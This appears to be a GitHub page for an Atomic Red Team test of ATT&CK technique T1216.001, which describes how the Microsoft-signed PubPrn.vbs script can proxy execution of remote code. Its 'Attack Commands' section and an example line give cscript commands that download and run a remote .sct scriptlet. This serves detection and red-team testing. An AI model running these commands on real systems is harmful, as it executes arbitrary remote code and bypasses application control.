Skip to content

Latest commit

 

History

History
40 lines (19 loc) · 1.49 KB

T1216.001.md

File metadata and controls

40 lines (19 loc) · 1.49 KB

T1216.001 - PubPrn

Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.

PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png.

Atomic Tests


Atomic Test #1 - PubPrn.vbs Signed Script Bypass

Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
remote_payload A remote payload to execute using PubPrn.vbs. Url https://github.com/raw/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct

Attack Commands: Run with command_prompt!

cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"